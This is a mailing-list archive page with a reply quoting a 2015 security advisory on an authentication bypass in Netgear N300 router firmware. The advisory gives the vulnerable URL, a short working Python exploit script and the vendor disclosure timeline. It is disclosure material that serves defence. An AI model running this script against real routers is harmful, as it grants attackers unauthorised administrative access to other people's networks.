| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAEqqQab5HUhZP+spQs-SBTD1itCYNoGzLe+NZHMj9uExzCf3PQ@mail.gmail.com>
Date: Tue, 6 Oct 2015 10:01:35 -0700
From: Joe G <joseph.giron13@...il.com>
To: Alexandre Herzog <Alexandre.Herzog@...c.ch>
Cc: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>,
"bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>
Subject: Re: [FD] Authentication Bypass in Netgear Router Firmware
N300_1.1.0.31_1.0.1.img and N300-1.1.0.28_1.0.1.img
I can confirm that this is actively being exploited in the wild as we
speak. I got owned last week.
On Tue, Oct 6, 2015 at 7:59 AM, Alexandre Herzog <Alexandre.Herzog@...c.ch>
wrote:
> #############################################################
> #
> # COMPASS SECURITY ADVISORY
> # http://www.csnc.ch/en/downloads/advisories.html
> #
> #############################################################
> #
> # Product: Netgear Router Firmware N300_1.1.0.31_1.0.1.img
> # and N300-1.1.0.28_1.0.1.img
> # Vendor: NETGEAR
> # CVE ID: requested
> # Subject: Authentication Bypass
> # Risk: High
> # Effect: Remotely exploitable over LAN/WLAN
> # Author: Daniel Haake (daniel.haake@...c.de)
> # Date: 06.10.2015
> #
> #############################################################
>
>
> Introduction:
> -------------
> Multiple NETGEAR wireless routers are out of the box vulnerable
> to an authentication bypass attack. No router options has to
> be changed to exploit the issue. So an attacker can access the
> administration
> interface of the router without submitting any valid username and
> password, just by requesting a special URL several times.
>
>
> Affected:
> ---------
> - Router Firmware: N300_1.1.0.31_1.0.1.img
> - Router Firmware; N300-1.1.0.28_1.0.1.img
> - tested and confirmed on the WNR1000v4 Router with both firmwares
> - other products may also be vulnerable because the firmware is used in
> multiple devices
>
>
> Technical Description:
> ----------------------
> The attacker can exploit the issue by using a browser or writing a simple
> exploit.
> 1. When a user wants to access the web interface, a http basic
> authentication login process is initiated
> 2. If he does not know the username and password he gets redirected to the
> 401_access_denied.htm file
> 3. An attacker now has to call the URL
> http://<ROUTER-IP>/BRS_netgear_success.html multiple times
> -> After that if he can access the administration web interface and there
> is
> no username/password prompt
>
>
> Example Python script:
> ----------------------
> import os
> import urllib2
> import time
> import sys
>
> try:
> first = urllib2.urlopen("http://" + sys.argv[1])
> print "No password protection!"
> except:
> print "Password protection detected!"
> print "Executing exploit..."
> for i in range(0,3):
> time.sleep(1)
> urllib2.urlopen("http://" + sys.argv[1] +
> "/BRS_netgear_success.html")
>
> second = urllib2.urlopen("http://" + sys.argv[1])
> if second.getcode() == 200:
> print "Bypass successfull. Now use your browser to have a
> look at the admin interface."
>
>
> Workaround/Fix:
> ---------------
> None so far. A patch already fixing this vulnerability was developed by
> Netgear but not released so far
> (see timeline below).
>
>
> Timeline:
> ---------
> Vendor Status: works on patch-release
> 21.07.2015: Vendor notified per email (security@...gear.com)
> -> No response
> 23.07.2015: Vendor notified via official chat support
> 24.07.2015: Support redirected notification to the technical team
> 29.07.2015: Requested status update and asked if they need further
> assistance
> -> No response
> 21.08.2015: Notified vendor that we will go full disclosure within 90 days
> if they do not react
> 03.09.2015: Support again said that they will redirect it to the technical
> team
> 03.09.2015: Netgear sent some beta firmware version to look if the
> vulnerability is fixed
> 03.09.2015: Confirmed to Netgear that the problem is solved in this version
> Asked Netgear when they plan to release the firmware with this
> security fix
> 11.09.2015: Response from Netgear saying they will not disclose the patch
> release day
> 15.09.2015: Asked Netgear again when they plan to publish the security fix
> for the second time
> -> No response
> 29.09.2015: Full disclosure of this vulnerability by SHELLSHOCK LABS
> 06.10.2015: Forced public release of this advisory to follow up on [2]
>
>
> References:
> -----------
> [1] http://support.netgear.com/product/WNR1000v4
> [2]
>
> http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.ht
> ml
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists